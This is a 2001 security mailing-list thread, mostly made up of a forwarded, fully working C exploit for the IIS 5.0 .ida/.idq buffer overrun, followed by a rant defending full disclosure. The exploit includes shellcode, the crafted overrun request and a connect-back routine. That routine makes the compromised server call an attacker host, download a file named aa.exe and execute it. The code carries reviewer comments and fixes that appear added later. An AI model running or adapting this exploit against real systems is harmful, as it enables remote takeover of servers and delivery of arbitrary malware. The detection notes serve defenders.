Well, I got it compiled with no problem, but what the hell does <file> do? I tried to overwrite a file in a writeable directory, and then tried to create a file in a writable directory — hmm, is there something I'm not seeing here? Thanks, -D Marc Maiffret wrote: > This came across Steve's win2ksec mailing list almost a week or so ago. Not > sure why none of the securityfocus mailing lists have picked it up (at least > to my knowledge). Working remote IIS exploit for the .ida hole. Figured > since you guys have had a discussion about writing an exploit for it etc... > this might be helpful to you. > > Signed, > Marc Maiffret > Chief Hacking Officer > eEye Digital Security > T.949.349.9062 > F.949.349.9538 > http://eEye.com/Retina - Network Security Scanner > http://eEye.com/Iris - Network Traffic Analyzer > http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities > > ||> ----- Original Message ----- > ||> From: "Steve" <steveat_private> > ||> To: <win2ksecadviceat_private> > ||> Sent: Wednesday, June 27, 2001 2:57 PM > ||> Subject: Fwd: Full Disclosure .ida exploit. > ||> > ||> > ||> > This was sent to me a few minutes ago. Here is the code as posted to > ||> Packet Storm and a rant by the person who brought it to my attention. > ||While > ||> I normally have tried to keep rants off of the mailing list, I > ||have always > ||> been very pro full disclosure and will do my best to defend it. Please > ||> note, I have not verified this code to be functioning, but will make an > ||> attempt to later this evening. If anyone else has time (Ken? Mark?) > ||please > ||> do so and post to the list. 
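-Steve

/*
 * IIS 5.0 .idq overrun remote exploit
 * Programmed by hsj : 01.06.21
 *
 * Code flow:
 *   overrun -> jmp or call ebx -> jmp 8 ->
 *   check shellcode addr and jump to there ->
 *   shellcode -> make back channel -> download & exec code
 *
 * Reviewer notes (security):
 *  - Target is the Index Server ISAPI extension (.ida/.idq) overrun in
 *    IIS 5.0 (patched in MS01-033; removing the .ida/.idq script mappings
 *    also closes it). The request main() sends is
 *    "GET /a.idq?<overrun>=a HTTP/1.0" with the payload carried in a
 *    non-standard "Shell:" request header. Both are detection signatures:
 *    a .idq/.ida query string of a few hundred bytes of 0x01 filler and
 *    %uXXXX escapes, and any "Shell:" header at all.
 *  - Each %uXXXX escape decodes to two raw bytes, low byte first: "%u08eb"
 *    is EB 08, x86 "jmp +8", matching the "jmp 8" step above; RET is sent
 *    as its low 16 bits then its high 16 bits for the same reason.
 *  - RET, GMHANDLEA and GPADDRESS are absolute addresses inside one
 *    specific kernel32.dll image. The exploit works only against that exact
 *    build; on any other it crashes the worker instead.
 *  - The shellcode resolves the imports named in storage[] and connects
 *    back from the target to ADDR:PORT. The parent listens there and streams
 *    the <file> given on the command line; the literal bytes
 *    \x5C\x61\x61\x2E ... \x65\x78\x65 in the shellcode spell "\aa.exe",
 *    and the import list ends in _open._write._close._execl., so the
 *    received bytes are presumably written to that file and executed.
 *    Confirm the exact open()/exec() arguments by disassembly.
 *  - main() refuses to send if a patched byte is 0x0a, 0x0d or 0x3a (they
 *    would end or split the HTTP header line) or 0x00 (shortens the
 *    string). The MASKING xor is what makes such port/address values
 *    sendable at all.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>

#define RET 0x77e516de              /* jmp or call ebx (kernel32, one specific build) */
#define GMHANDLEA 0x77e56c42        /* Address of GetModuleHandleA */
#define GPADDRESS 0x77e59ac1        /* Address of GetProcAddress */
#define GMHANDLEA_OFFSET 24         /* imm32 of the "mov eax, GetModuleHandleA" */
#define GPADDRESS_OFFSET 61         /* imm32 of the "mov eax, GetProcAddress" */
#define OFFSET 234                  /* exception handler offset */
#define NOP 0x41

#define MASKING 1
#if MASKING
#define PORTMASK 0x4141
#define ADDRMASK 0x41414141
#define PORTMASK_OFFSET 128         /* imm16 of the "xor word [esi+2], PORTMASK" */
#define ADDRMASK_OFFSET 133         /* imm32 of the "xor dword [esi+4], ADDRMASK" */
#endif

#define PORT 80                     /* call-back port the parent listens on */
#define ADDR "attacker.mydomain.co.jp"  /* call-back host; must resolve to this machine */
#define PORT_OFFSET 115             /* imm16 of the "mov word [esi+2], port" */
#define ADDR_OFFSET 120             /* imm32 of the "mov dword [esi+4], addr" */

/* Position-independent x86 payload; the offsets above index into it. */
unsigned char shellcode[]=
"\x5B\x33\xC0\x40\x40\xC1\xE0\x09\x2B\xE0\x33\xC9\x41\x41\x33\xC0"
"\x51\x53\x83\xC3\x06\x88\x03\xB8\xDD\xCC\xBB\xAA\xFF\xD0\x59\x50"
"\x43\xE2\xEB\x33\xED\x8B\xF3\x5F\x33\xC0\x80\x3B\x2E\x75\x1E\x88"
"\x03\x83\xFD\x04\x75\x04\x8B\x7C\x24\x10\x56\x57\xB8\xDD\xCC\xBB"
"\xAA\xFF\xD0\x50\x8D\x73\x01\x45\x83\xFD\x08\x74\x03\x43\xEB\xD8"
"\x8D\x74\x24\x20\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\xFC\xFF\xD0"
"\x8B\xF8\x33\xC0\x40\x40\x66\x89\x06\xC1\xE0\x03\x50\x56\x57\x66"
"\xC7\x46\x02\xBB\xAA\xC7\x46\x04\x44\x33\x22\x11"
#if MASKING
"\x66\x81\x76\x02\x41\x41\x81\x76\x04\x41\x41\x41\x41"
#endif
"\x8B\x46\xF8\xFF\xD0\x33\xC0"
"\xC7\x06\x5C\x61\x61\x2E\xC7\x46\x04\x65\x78\x65\x41\x88\x46\x07"
"\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\x8B\x46\xEC\xFF\xD0"
"\x8B\xD8\x33\xC0\x50\x40\xC1\xE0\x09\x50\x8D\x4E\x08\x51\x57\x8B"
"\x46\xF4\xFF\xD0\x85\xC0\x7E\x0E\x50\x8D\x4E\x08\x51\x53\x8B\x46"
"\xE8\xFF\xD0\x90\xEB\xDC\x53\x8B\x46\xE4\xFF\xD0\x57\x8B\x46\xF0"
"\xFF\xD0\x33\xC0\x50\x56\x56\x8B\x46\xE0\xFF\xD0\x33\xC0\xFF\xD0";

/*
 * Placed immediately before shellcode[] in the "Shell:" header: a short
 * jump stub followed by the '.'-separated DLL and import names the
 * shellcode resolves at run time through GetModuleHandleA/GetProcAddress.
 */
unsigned char storage[]=
"\xEB\x02"
"\xEB\x4E"
"\xE8\xF9\xFF\xFF\xFF"
"msvcrt.ws2_32.socket.connect.recv.closesocket."
"_open._write._close._execl.";

/* %u-encoded "jmp +8" (bytes EB 08) that skips over the return address. */
unsigned char forwardjump[]=
"%u08eb";

/* %u-encoded stub that locates the payload and jumps to it (see code flow). */
unsigned char jump_to_shell[]=
"%uC033%uB866%u031F%u0340%u8BD8%u8B03"
"%u6840%uDB33%u30B3%uC303%uE0FF";

/*
 * Resolve a dotted-quad or host name to an IPv4 address in network byte
 * order. Returns 0 when the name cannot be resolved.
 *
 * Caveats kept from the original: 0 (INADDR_ANY) doubles as the failure
 * value, and "255.255.255.255" equals INADDR_NONE and so falls through to
 * a DNS lookup. gethostbyname() is obsolete and not thread-safe;
 * getaddrinfo() is the modern replacement.
 */
unsigned int resolve(char *name)
{
    unsigned int ip = inet_addr(name);

    if (ip == INADDR_NONE) {
        struct hostent *he = gethostbyname(name);

        /* Only accept an IPv4 answer of the size we are about to copy. */
        if (he == NULL || he->h_addrtype != AF_INET ||
            he->h_length != (int)sizeof ip || he->h_addr_list[0] == NULL)
            return 0;
        memcpy(&ip, he->h_addr_list[0], sizeof ip);
    }
    return ip;
}

/*
 * Open a TCP connection to address:port with a 10 second connect timeout.
 * Returns a blocking, connected socket (>= 0) or a negative code:
 *  -1 socket() failed, -2 address did not resolve, -3 select() failed,
 *  -4 timed out, -5 connect failed (errno carries the socket error).
 */
int make_connection(char *address, int port)
{
    struct sockaddr_in target;
    struct timeval tv;
    fd_set wd;
    socklen_t optlen;
    int s, ready, soerr, on;

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return -1;

    memset(&target, 0, sizeof target);
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = resolve(address);
    if (target.sin_addr.s_addr == 0) {
        close(s);
        return -2;
    }
    target.sin_port = htons(port);

    /* Non-blocking connect so the select() timeout below is honoured. */
    on = 1;
    ioctl(s, FIONBIO, &on);
    if (connect(s, (struct sockaddr *)&target, sizeof target) < 0 &&
        errno != EINPROGRESS) {
        /* Immediate failure (e.g. unreachable network): report it now. */
        soerr = errno;
        close(s);
        errno = soerr;
        return -5;
    }

    tv.tv_sec = 10;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s, &wd);
    ready = select(s + 1, NULL, &wd, NULL, &tv);
    if (ready < 0) {
        close(s);
        return -3;
    }
    if (ready == 0) {
        close(s);
        return -4;
    }

    /* Writable does not mean connected: a refused connect also wakes
     * select(); the real outcome is in SO_ERROR. */
    soerr = 0;
    optlen = sizeof soerr;
    if (getsockopt(s, SOL_SOCKET, SO_ERROR, &soerr, &optlen) < 0)
        soerr = errno;
    if (soerr != 0 || optlen != sizeof soerr) {
        close(s);
        errno = soerr;
        return -5;
    }

    /* Hand the caller a blocking socket again. */
    on = 0;
    ioctl(s, FIONBIO, &on);
    return s;
}

/*
 * Listen on 0.0.0.0:port and block until one client connects. Returns the
 * accepted socket; the listening socket is closed first. Any failure is
 * reported with perror() and exits the process (original contract; this
 * runs in the forked child).
 *
 * Note: there is no authentication of the peer. Whoever connects to this
 * port first, from any address, receives the file the child then sends.
 */
int get_connection(int port)
{
    struct sockaddr_in local, remote;
    socklen_t remote_len;
    int lsock, csock, reuse = 1;

    lsock = socket(AF_INET, SOCK_STREAM, 0);
    if (lsock < 0) {
        perror("socket");
        exit(1);
    }
    if (setsockopt(lsock, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof reuse) < 0) {
        perror("setsockopt");
        close(lsock);
        exit(1);
    }

    memset(&local, 0, sizeof local);
    local.sin_family = AF_INET;
    local.sin_port = htons(port);
    local.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(lsock, (struct sockaddr *)&local, sizeof local) < 0) {
        perror("bind");
        close(lsock);
        exit(1);
    }
    if (listen(lsock, 1) < 0) {
        perror("listen");
        close(lsock);
        exit(1);
    }

    /* Retry accept() only when a signal interrupted it. */
    do {
        remote_len = sizeof remote;
        csock = accept(lsock, (struct sockaddr *)&remote, &remote_len);
    } while (csock < 0 && errno == EINTR);
    if (csock < 0) {
        perror("accept");
        close(lsock);
        exit(1);
    }

    close(lsock);
    return csock;
}

/* Entry point follows; its signature is split across lines in the original. */
int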
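main(int argc, char *argv[])
{
    /*
     * Entry point. Usage: <prog> <target ip> <file>.
     *
     * Parent: connects to the target on TCP/80, patches the call-back
     * details into shellcode[], sends the overrun request, dumps it in hex
     * and waits for the child. Child: listens on PORT for the target's
     * call-back and streams <file> to it (the shellcode writes what it
     * receives to disk on the target and executes it).
     *
     * Return codes mirror the original: -1 usage, -2 cannot open file,
     * -3 ADDR does not resolve, -4 fork failed, -5 connect failed,
     * -6 a patched byte cannot be carried in the request; -7 (new) the
     * request did not fit or could not be sent.
     *
     * ADDR and PORT are compile-time constants: ADDR must resolve to this
     * machine (or something forwarding to it), otherwise the target calls
     * back into the void and the child blocks in accept() forever.
     */
    char buf[512], buf2[512], req[2048];
    char *p;
    unsigned int cb;
    unsigned short port;
    size_t i, j, sclen, stlen, off;
    int k, s, n;
    pid_t pid;
    FILE *fp;

    if (argc != 3) {
        printf("usage: $ %s ip file\n", argv[0]);
        return -1;
    }
    if ((fp = fopen(argv[2], "rb")) == NULL)
        return -2;
    if (!(cb = resolve(ADDR))) {
        fclose(fp);
        return -3;
    }
    if ((pid = fork()) < 0) {
        fclose(fp);
        return -4;
    }

    if (pid == 0) {
        /* Child: serve <file> to whoever connects to PORT (no peer check). */
        s = get_connection(PORT);
        j = 0;
        while ((i = fread(buf, 1, sizeof buf, fp)) > 0) {
            /* Loop until the whole chunk is written; write() may be short. */
            for (off = 0; off < i; ) {
                ssize_t w = write(s, buf + off, i - off);
                if (w < 0) {
                    if (errno == EINTR)
                        continue;
                    perror("write");
                    break;
                }
                off += (size_t)w;
            }
            if (off < i)
                break;
            j += i;
            printf(".");
            fflush(stdout);
        }
        fclose(fp);
        printf("\n%d bytes send...\n", (int)j);
        shutdown(s, 2);
        close(s);
        return 0;
    }

    /* Parent: the file handle belongs to the child from here on. */
    fclose(fp);
    s = make_connection(argv[1], 80);
    if (s < 0) {
        printf("connect error:[%d].\n", s);
        kill(pid, SIGTERM);
        return -5;
    }

    /*
     * Patch the payload. The two API addresses are x86 imm32 operands and
     * must be little-endian regardless of the build host; the original
     * wrote them through (unsigned int *) casts, which is misaligned /
     * aliasing UB and silently wrong on a big-endian host. Port and
     * address are already in network byte order, so their bytes are copied
     * as-is; the xor masks are symmetric and endian-neutral.
     */
    j = strlen((const char *)shellcode);
    for (k = 0; k < 4; k++) {
        shellcode[GMHANDLEA_OFFSET + k] = (unsigned char)(GMHANDLEA >> (8 * k));
        shellcode[GPADDRESS_OFFSET + k] = (unsigned char)(GPADDRESS >> (8 * k));
    }
    port = htons(PORT);
#if MASKING
    {
        unsigned short pmask = PORTMASK;
        unsigned int amask = ADDRMASK;

        port ^= PORTMASK;
        cb ^= ADDRMASK;
        memcpy(&shellcode[PORTMASK_OFFSET], &pmask, sizeof pmask);
        memcpy(&shellcode[ADDRMASK_OFFSET], &amask, sizeof amask);
    }
#endif
    memcpy(&shellcode[PORT_OFFSET], &port, sizeof port);
    memcpy(&shellcode[ADDR_OFFSET], &cb, sizeof cb);

    /*
     * Reject bytes the HTTP header cannot carry: 0x0a/0x0d end the header
     * line, 0x3a (':') splits it. A 0x00 would shorten strlen(), so the
     * post-patch length is compared with the pre-patch length j as well.
     */
    for (i = 0; i < strlen((const char *)shellcode); i++) {
        if (shellcode[i] == 0x0a || shellcode[i] == 0x0d || shellcode[i] == 0x3a)
            break;
    }
    if (i != j) {
        printf("bad portno or ip address...\n");
        close(s);
        kill(pid, SIGTERM);
        return -6;
    }

    /*
     * Query string: OFFSET-2 bytes of 0x01 filler (non-zero, not a '%' or
     * a separator), then %u-encoded "jmp 8", a 0x01 pad, RET low then high
     * 16 bits, a 0x01 pad, and the stub that jumps into the shellcode.
     * Bounded up front; the original relied on the sizes happening to fit.
     */
    sclen = strlen((const char *)shellcode);
    stlen = strlen((const char *)storage);
    if ((size_t)(OFFSET - 2) + strlen((const char *)forwardjump) + 14 +
            strlen((const char *)jump_to_shell) + 1 > sizeof buf ||
        sclen + stlen + 1 > sizeof buf2) {
        printf("payload does not fit the request buffers\n");
        close(s);
        kill(pid, SIGTERM);
        return -7;
    }
    memset(buf, 1, sizeof buf);
    p = &buf[OFFSET - 2];
    p += sprintf(p, "%s", (const char *)forwardjump);
    *p++ = 1;
    p += sprintf(p, "%%u%04x", (unsigned)((RET >> 0) & 0xffff));
    p += sprintf(p, "%%u%04x", (unsigned)((RET >> 16) & 0xffff));
    *p++ = 1;
    sprintf(p, "%s", (const char *)jump_to_shell);

    /* "Shell:" header: NOP sled, then storage[] (import names), then the
     * shellcode, right-aligned so the payload ends the header value. */
    memset(buf2, NOP, sizeof buf2);
    memcpy(&buf2[sizeof buf2 - sclen - stlen - 1], storage, stlen);
    memcpy(&buf2[sizeof buf2 - sclen - 1], shellcode, sclen);
    buf2[sizeof buf2 - 1] = 0;

    n = snprintf(req, sizeof req,
                 "GET /a.idq?%s=a HTTP/1.0\r\nShell: %s\r\n\r\n", buf, buf2);
    if (n < 0 || (size_t)n >= sizeof req) {
        printf("request too long\n");
        close(s);
        kill(pid, SIGTERM);
        return -7;
    }

    /* Send the whole request; a short write would truncate the overrun. */
    for (off = 0; off < (size_t)n; ) {
        ssize_t w = write(s, req + off, (size_t)n - off);
        if (w < 0) {
            if (errno == EINTR)
                continue;
            perror("write");
            close(s);
            kill(pid, SIGTERM);
            return -7;
        }
        off += (size_t)w;
    }

    /* Diagnostic hex dump of exactly what went on the wire. */
    printf("---");
    for (i = 0; i < (size_t)n; i++) {
        if ((i % 16) == 0)
            printf("\n");
        printf("%02X ", (unsigned char)req[i]);
    }
    printf("\n---\n");

    wait(0);            /* child returns once the file has been served */
    sleep(1);
    shutdown(s, 2);
    close(s);

    printf("Done.\n");
    return 0;
}
> ||> > >From: fuq69rcat_private > ||> > >Date: Wed, 27 Jun 2001 13:17:57 -0800 (PDT) > ||> > >To: steveat_private > ||> > >Subject: Full Disclosure .ida exploit. > ||> > > > ||> > >Steve I hope you let this through you your win2k mailing list. I know > ||its > ||> > >a bit of a rant but I think it needs to be said and also the > |fact that > ||> there > ||> > >is a link to the .ida exploit should be worth while enough. Thanks. > ||> > >----- > ||> > >Isn't it strange that a gift can be an enemy? That a > ||privilege can be a > ||> > >chore. Maybe its just me but security is going nowhere fast because > ||> everyone > ||> > >is to busy looking at the ten thousand foot view instead of getting > ||down, > ||> > > getting their hands dirty, and fixing the problem at its core. 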
> ||> > > > ||> > >I see everyone trying to run around and figure out what to do > ||about the > ||> > >hax0rs and the script kiddies. Bureaucrats and people who have never > |been security > ||> experts > ||> > >are all looking to form organizations that they hope will cut down on > ||the > ||> > >"threat" of vulnerability exposure, when that's not the real problem. > ||> Software > ||> > >companies writing insecure software IS the problem. > ||> > > > ||> > >Who gets shit on in the end? The hackers and researchers > |putting their > ||> own > ||> > >time into finding vulnerabilities in software that's been developed by > ||> multi- > ||> > >billion dollar software companies. These same hackers and researchers > ||who > ||> > >have done all of this work for FREE, to help the security community. > ||They > ||> > >end up being the ones that get shit on for releasing this information > ||to > ||> > >the masses so that they might help educate people about security > ||> vulnerabilities > ||> > >and keep software companies on their toes and honest about > ||the security > ||> > >issues that affect their software. > ||> > > > ||> > >Most software companies do not take security seriously, regardless of > ||> what > ||> > >they say, because the bean counters at most software companies never > ||see > ||> > >an ROI (Return on Investment) for adding much needed security > ||mechanisms > ||> > >to their software. Why not? Because honestly not > ||enough people > ||> > >are standing up and demanding a change. Instead the majority of > ||> administrators, > ||> > > NT at least, tend to just laugh and say, for example, "Ahh haha > ||another > ||> > >MS hole, what's new" and then proceed to shrug it off, stay > |bent over, > ||> and > ||> > >keep taking it from software companies. 
> ||> > > > ||> > >Also, for those administrators that actually do care about security, > ||you'll > ||> > >tend to find that a lot of them are actually paranoid about > |installing > ||> security > ||> > >patches from companies like Microsoft because they've had a > |really bad > ||> track > ||> > >record of creating patches that end up breaking things and then need patches > ||> themselves. > ||> > >So the administrators end up waiting for the next service pack (which > ||> leaves > ||> > >them vulnerable), UNLESS they have a full disclosure example exploit > ||that > ||> > >first hand shows them how serious the vulnerability is, at > |which point > ||I > ||> > >promise you they WILL install the patch. > ||> > > > ||> > >I could go on forever about the circles the security industry is > ||running > ||> > >in or how 80% of the "security experts" have never done ANYTHING to > ||help > ||> > >security (hi russ!!) besides spout off about topics they > ||> usually > ||> > >have never really experienced first hand. > ||> > > > ||> > >A handful of people, like Russ Cooper, have said that when people > ||release > ||> > >non-malicious example exploits it makes it easier for people to > ||take > ||> > >those exploits and tweak them into doing bad things. That is > ||completely > ||> > >inaccurate and it's a statement being made by someone who > |wouldn't know > ||> what > ||> > >an exploit was if shellcode slapped him in the face. > ||> > > > ||> > >I came across this the other day on packetstorm. Working .ida exploit > ||> which > ||> > >is probably one of the first publicly released, although as > ||always when > ||> > >any big hole is released and you don't see exploits on > |Bugtraq or what > ||> not, > ||> > >that just MEANS people aren't sharing their exploits with > ||> everyone > ||> > >but they are out there and most likely being used. 
> ||> > > > ||> > > ||> > ||>http://209.143.242.119/cgi-bin/cbmc/forums.cgi?authkey=anonymous&uname=anonymous&datopic=General&mesgcheck=defined&gum=3087&editoron= > ||> > > > ||> > >There is a whole other world out there that few people can even begin > ||to > ||> > >understand. Exploits are created daily for all types of > ||vulnerabilities > ||> > >that people might have a use for. Just because you don't see it on the > ||> handful > ||> > >of security mailing lists, or because CERT, NIPC, or Russ Cooper have > ||not > ||> > >heard about it does not mean it is not there. > ||> > > > ||> > >All those opposed to full disclosure, be damned. For to resist is to > ||piss > ||> > >against the wind and all who do will end up smelling. > ||> > >Free, encrypted, secure Web-based email at www.hushmail.com > ||> > > ||> > _____________________________________________________________________ > ||> > ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" > ||> > ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" > ||> > SEND ALL COMMANDS TO: listservat_private > ||> > > ||> > ||> > || > || -- ------------------------------ Christopher M Downs Network Security Administrator Skillsoft Corporation cdownsat_private "Micro$oft typed backwards spells "c:\duh /?" ------------------------------ -------------------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service, which automatically alerts you to the latest security vulnerabilities, please see: https://alerts.securityfocus.com/